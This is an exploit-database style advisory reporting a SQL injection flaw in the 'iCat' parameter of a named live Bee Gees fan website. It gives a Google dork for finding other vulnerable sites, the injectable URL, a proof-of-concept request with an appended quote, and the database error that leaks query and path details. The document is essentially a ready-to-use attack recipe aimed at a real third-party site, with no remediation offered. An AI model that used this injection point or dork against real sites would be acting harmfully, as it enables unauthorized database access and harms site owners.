#################################################################################################
# Exploit Title : Bee Gees Italy © 1998-2017 Enzo Lo Piccolo SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : beegees.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Bee Gees Italy © 1998-2017 Enzo Lo Piccolo''
# Exploit : /bgs/photos/cat.asp?iCat=[SQL Inj]
#################################################################################################
# Example Site => beegees.it/bgs/photos/cat.asp?iCat=16%27 => [ Proof of Concept ] => archive.is/8uYIm
# SQL Database Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = 16'''.
/bgs/photos/inc_cat.asp, line 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################